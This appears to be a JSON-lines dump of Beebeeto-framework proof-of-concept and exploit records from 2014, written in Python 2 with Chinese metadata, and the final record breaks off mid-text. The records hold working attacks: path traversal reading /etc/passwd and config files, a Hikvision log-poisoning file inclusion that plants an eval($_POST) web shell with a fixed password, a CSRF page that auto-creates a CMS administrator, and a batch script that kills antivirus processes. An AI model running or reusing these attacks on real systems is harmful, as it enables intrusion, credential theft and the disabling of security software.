{"create_date": "2014-11-29 00:11:56", "name": "PHPMyAdmin 4.2.12 /libraries/gis/pma_gis_factory.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "phpmyadmin\u6f0f\u6d1e,\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e,/libraries/gis/pma_gis_factory.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0168',\r\n 'name': 'PHPMyAdmin 4.2.12 /libraries/gis/pma_gis_factory.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-28',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpmyadmin',\r\n 'vul_version': ['4.2.12'],\r\n 'type': 'Local File Inclusion',\r\n 'tag': ['phpmyadmin\u6f0f\u6d1e', '\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e', '/libraries/gis/pma_gis_factory.php', 'php'],\r\n 'desc': '''\r\n CVE-2014-8959(http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8959)\r\n issue: http://www.phpmyadmin.net/home_page/security/PMASA-2014-14.php\r\n fix: https://github.com/phpmyadmin/phpmyadmin/commit/2e3f0b9457b3c8f78beb864120bd9d55617a11b5\r\n ''',\r\n 'references': ['http://bobao.360.cn/learning/detail/113.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n # Token & file_path, Modify their own.\r\n token = 'ChangeME'\r\n inclusion_file = '../../../ChangeMe.jpg%00'\r\n tmp_url = args['options']['target'] + 
'/pma/gis_data_editor.php?token=' + token\r\n verify_url = tmp_url + '&gis_data[gis_type]=' + inclusion_file\r\n if args['options']['verbose']:\r\n print '[*] Generation...'\r\n print '[+] Specific use: ' + 'edit token, inclusion_file.'\r\n print '[+] Generation ok'\r\n print\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "CVE-2014-8959(http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8959)\r\nissue: http://www.phpmyadmin.net/home_page/security/PMASA-2014-14.php\r\nfix: https://github.com/phpmyadmin/phpmyadmin/commit/2e3f0b9457b3c8f78beb864120bd9d55617a11b5", "app_name": "PHPMyAdmin", "id": "poc-2014-0168", "layer4_protocol": null}
{"create_date": "2014-11-27 18:22:15", "name": "WordPress HTML 5 MP3 Player with Playlist \u63d2\u4ef6\u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Wordpress\u63d2\u4ef6\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,html5-mp3-player-with-playlist\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0166',\r\n 'name': 'WordPress HTML 5 MP3 Player with Playlist \u63d2\u4ef6\u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-11-27',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Wordpress\u63d2\u4ef6\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', 'html5-mp3-player-with-playlist\u6f0f\u6d1e', 'php'],\r\n 'desc': 'DORK: inurl:html5plus/html5full.php',\r\n 'references': ['http://www.exploit-db.com/exploits/35388/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_path = '/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php'\r\n verify_url = args['options']['target'] + file_path\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<b>Fatal error</b>:' in content and '</b> on line <b>' in 
content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "DORK: inurl:html5plus/html5full.php", "app_name": "WordPress", "id": "poc-2014-0166", "layer4_protocol": null}
{"create_date": "2014-11-26 15:34:02", "name": "U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u6f0f POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "jwong", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "U-Mail\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/api/api.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0165',\r\n 'name': 'U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u6f0f POC',\r\n 'author': 'jwong',\r\n 'create_date': '2014-11-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'U-Mail',\r\n 'vul_version': ['20141124'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['U-Mail\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/api/api.php', 'php'],\r\n 'desc': 'U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u9732\u3002',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-070206',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/webmail/api/api.php?do=system'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'Warning' in content and 'system()' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import 
pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "U-Mail 20141124 /api/api.php \u654f\u611f\u4fe1\u606f\u6cc4\u9732\u3002", "app_name": "U-Mail", "id": "poc-2014-0165", "layer4_protocol": null}
{"create_date": "2014-11-25 10:32:53", "name": "\u5317\u4eac\u5e0c\u5c14\u81ea\u52a8\u5316OA\u7ba1\u7406\u7cfb\u7edf/\u6570\u636e\u5e93\u7cfb\u7edf /bnuoa/info/infoShowAction.do \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "\u96f7\u950b", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u5e0c\u5c14\u81ea\u52a8\u5316OA\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,bnuoa/info/infoShowAction.do,Linux\u7248\u672c", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0163',\r\n 'name': '\u5317\u4eac\u5e0c\u5c14\u81ea\u52a8\u5316OA\u7ba1\u7406\u7cfb\u7edf/\u6570\u636e\u5e93\u7cfb\u7edf /bnuoa/info/infoShowAction.do \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n 'author': '\u96f7\u950b',\r\n 'create_date': '2014-11-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'OA',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['\u5e0c\u5c14\u81ea\u52a8\u5316OA\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', 'bnuoa/info/infoShowAction.do', 'Linux\u7248\u672c'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-058386',\r\n ]\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n verify_url = args['options']['target'] + ('/bnuoa/info/infoShowAction.do?accessory=1&id='\r\n '../../../../../../../../../../etc/passwd%00.jpg&method=getAccessory')\r\n req = 
urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"root:\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0163", "layer4_protocol": null}
{"create_date": "2014-11-25 10:20:09", "name": "phpstat 1.0 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "jwong", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "phpstat\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d,/download.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0162',\r\n 'name': 'phpstat 1.0 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC',\r\n 'author': 'jwong',\r\n 'create_date': '2014-11-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpstat',\r\n 'vul_version': ['1.0'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['phpstat\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d', '/download.php', 'php'],\r\n 'desc': 'phpstat v1.0.20141124 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u3002',\r\n 'references': ['http://0day5.com/archives/2372',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/download.php?fname=1.txt&fpath=./include.inc/config.inc.php'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'root' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n 
mp = MyPoc()\r\n pprint(mp.run())", "desc": "phpstat v1.0.20141124 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u3002", "app_name": "phpstat", "id": "poc-2014-0162", "layer4_protocol": null}
{"create_date": "2014-11-21 21:09:53", "name": "eYou /sysinfo.html \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5927\u7070\u72fc", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "eYou!\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,/sysinfo.html,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0157',\r\n 'name': 'eYou /sysinfo.html \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': '\u5927\u5927\u7070\u72fc',\r\n 'create_date': '2014-11-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'eYou',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['eYou!\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', '/sysinfo.html', 'php'],\r\n 'desc': 'eYou sysinfo Information Disclosure',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-061538',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n attack_url = args['options']['target'] + '/sysinfo.html'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + attack_url\r\n request = urllib2.Request(attack_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if 'Hostname:' in content and 'eyou' in content:\r\n args['success'] = True\r\n args['poc_ret']['verify_url'] = attack_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", 
"desc": "eYou sysinfo Information Disclosure", "app_name": "eYou", "id": "poc-2014-0157", "layer4_protocol": null}
{"create_date": "2014-11-21 17:00:06", "name": "Hikvision /Server/logs/error.log \u6587\u4ef6\u5305\u542b\u5bfc\u81f4GETSHELL\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "\u6d77\u5eb7\u5a01\u89c6\u6f0f\u6d1e,\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0156',\r\n 'name': 'Hikvision /Server/logs/error.log \u6587\u4ef6\u5305\u542b\u5bfc\u81f4GETSHELL\u6f0f\u6d1e POC & Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Hikvision',\r\n 'vul_version': ['iVMS-4200'],\r\n 'type': 'Local File Inclusion',\r\n 'tag': ['\u6d77\u5eb7\u5a01\u89c6\u6f0f\u6d1e', '\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e', 'php'],\r\n 'desc': '\u6d77\u5eb7\u5a01\u89c6IVMS\u7cfb\u5217\u7684\u76d1\u63a7\u5ba2\u6237\u7aef\uff0c\u4e0d\u8fc7\u5927\u90e8\u5206\u5728\u5185\u7f51\u3002',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-072453',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/<?echo(md5(bb2))?>'\r\n test_url = args['options']['target'] + '/index.php?controller=../../../../Server/logs/error.log%00.php'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n urllib2.urlopen(verify_url)\r\n except urllib2.HTTPError, e:\r\n if e.code == 500:\r\n content = 
urllib2.urlopen(test_url).read()\r\n if '0c72305dbeb0ed430b79ec9fc5fe8505' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url_1'] = verify_url\r\n args['poc_ret']['vul_url_2'] = test_url\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n verify_url = args['options']['target'] + '/<?echo(md5(bb2));eval($_POST[bb2])?>'\r\n test_url = args['options']['target'] + '/index.php?controller=../../../../Server/logs/error.log%00.php'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n urllib2.urlopen(verify_url)\r\n except urllib2.HTTPError, e:\r\n if e.code == 500:\r\n content = urllib2.urlopen(test_url).read()\r\n if '0c72305dbeb0ed430b79ec9fc5fe8505' in content:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = test_url\r\n args['poc_ret']['password'] = 'bb2'\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6d77\u5eb7\u5a01\u89c6IVMS\u7cfb\u5217\u7684\u76d1\u63a7\u5ba2\u6237\u7aef\uff0c\u4e0d\u8fc7\u5927\u90e8\u5206\u5728\u5185\u7f51\u3002", "app_name": "\u6d77\u5eb7\u5a01\u89c6", "id": "poc-2014-0156", "layer4_protocol": null}
{"create_date": "2014-11-20 23:48:10", "name": "Snowfox CMS 1.0 CSRF Add Admin Exploit", "level": "\u4f4e\u5371", "batchable": 0, "author": "tmp", "rank": 2, "port": null, "vul_type": "CSRF", "tag": "Snowfox CMS\u6f0f\u6d1e,CSRF\u6dfb\u52a0\u7ba1\u7406\u5458,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0154',\r\n 'name': 'Snowfox CMS 1.0 CSRF Add Admin Exploit',\r\n 'author': 'tmp',\r\n 'create_date': '2014-11-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Snowfox',\r\n 'vul_version': ['1.0'],\r\n 'type': 'Cross Site Request Forgery',\r\n 'tag': ['Snowfox CMS\u6f0f\u6d1e', 'CSRF\u6dfb\u52a0\u7ba1\u7406\u5458', 'php'],\r\n 'desc': '''\r\n Snowfox CMS suffers from a cross-site request forgery vulnerabilities.\r\n The application allows users to perform certain actions via HTTP requests\r\n without performing any validity checks to verify the requests.\r\n This can be exploited to perform certain actions with administrative privileges\r\n if a logged-in user visits a malicious web site.\r\n Tested on: Apache/2.4.7 (Win32)\r\n PHP/5.5.6\r\n MySQL 5.6.14\r\n Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/35301/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n verify_url = args['options']['target']\r\n if args['options']['verbose']:\r\n print '[*] Generation: ' + verify_url\r\n temp = '''\r\n <div style=\"display: none;\">\r\n <form 
action=\"%s/?uri=admin/accounts/create\" method=\"POST\" name=\"ff0000team\">\r\n <input type=\"hidden\" name=\"emailAddress\" value=\"[email protected]\" />\r\n <input type=\"hidden\" name=\"verifiedEmail\" value=\"verified\" />\r\n <input type=\"hidden\" name=\"username\" value=\"USERNAME\" />\r\n <input type=\"hidden\" name=\"newPassword\" value=\"PASSWORD\" />\r\n <input type=\"hidden\" name=\"confirmPassword\" value=\"PASSWORD\" />\r\n <input type=\"hidden\" name=\"userGroups[]\" value=\"34\" />\r\n <input type=\"hidden\" name=\"userGroups[]\" value=\"33\" />\r\n <input type=\"hidden\" name=\"memo\" value=\"CSRFmemo\" />\r\n <input type=\"hidden\" name=\"status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"formAction\" value=\"submit\" />\r\n <input type=\"submit\" value=\"Submit form\" />\r\n </form>\r\n </div>\r\n <script>\r\n setTimeout(\"document.ff0000team.submit()\", 2000);\r\n </script>\r\n ''' % verify_url\r\n print '[*] Copy code: ' + temp\r\n print '[*] Specific use: ' + str(MyPoc.poc_info['vul']['references'])\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 'Generation ok'\r\n return args\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Snowfox CMS suffers from a cross-site request forgery vulnerabilities. \r\nThe application allows users to perform certain actions via HTTP requests\r\nwithout performing any validity checks to verify the requests.\r\nThis can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.\r\n \r\nTested on: \r\n Apache/2.4.7 (Win32)\r\n PHP/5.5.6\r\n MySQL 5.6.14", "app_name": "Snowfox CMS", "id": "poc-2014-0154", "layer4_protocol": null}
{"create_date": "2014-11-20 00:15:06", "name": "\u767e\u5ea6\u6740\u6bd2 20141010 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "\u672c\u5730\u63d0\u6743,\u6740\u6389\u767e\u5ea6\u6740\u6bd2\u4e3b\u8fdb\u7a0b,chkdsk taskkill,\u767e\u5ea6\u6740\u6bd2\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0153',\r\n 'name': '\u767e\u5ea6\u6740\u6bd2 20141010 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC',\r\n 'author': '\u96f7\u8702',\r\n 'create_date': '2014-11-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'local',\r\n 'port': [0],\r\n 'layer4_protocol': [],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u767e\u5ea6',\r\n 'vul_version': ['20141010'],\r\n 'type': 'Other',\r\n 'tag': ['\u672c\u5730\u63d0\u6743', '\u6740\u6389\u767e\u5ea6\u6740\u6bd2\u4e3b\u8fdb\u7a0b', 'chkdsk taskkill', '\u767e\u5ea6\u6740\u6bd2\u6f0f\u6d1e'],\r\n 'desc': 'Wooyun Author zhuixing',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-078656',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n payload = '''\r\n@echo off\r\nmode con cols=20 lines=1\r\nchkdsk /x d:\r\ntaskkill /F /IM baidusdsvc.exe /T\r\ntaskkill /F /IM baidusdtray.exe /T\r\n'''\r\n # write\r\n test_bat = open('./baidu-anti-virus-taskkill.bat', 'w')\r\n test_bat.write(payload)\r\n test_bat.close()\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 'Generation ok, file: ./baidu-anti-virus-taskkill.bat'\r\n return args\r\n\r\n 
exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u767e\u5ea6", "id": "poc-2014-0153", "layer4_protocol": null}
{"create_date": "2014-11-20 00:05:56", "name": "360\u5b89\u5168\u536b\u58eb\u5b89\u88c5\u975e\u9ed8\u8ba4\u8def\u5f84 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "\u672c\u5730\u63d0\u6743,\u6740\u6389360\u4e3b\u8fdb\u7a0b,chkdsk taskkill,360\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0152',\r\n 'name': '360\u5b89\u5168\u536b\u58eb\u5b89\u88c5\u975e\u9ed8\u8ba4\u8def\u5f84 chkdsk taskkill\u4e3b\u8fdb\u7a0b POC',\r\n 'author': '\u96f7\u8702',\r\n 'create_date': '2014-11-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'local',\r\n 'port': [0],\r\n 'layer4_protocol': [],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '360',\r\n 'vul_version': ['*'],\r\n 'type': 'Other',\r\n 'tag': ['\u672c\u5730\u63d0\u6743', '\u6740\u6389360\u4e3b\u8fdb\u7a0b', 'chkdsk taskkill', '360\u6f0f\u6d1e'],\r\n 'desc': '''\r\n Wooyun Author zhuixing:\r\n \u6d4b\u8bd5\u4f7f\u7528Windows XP SP3\uff0cVMware Workstation 10.0.3\u3002\r\n 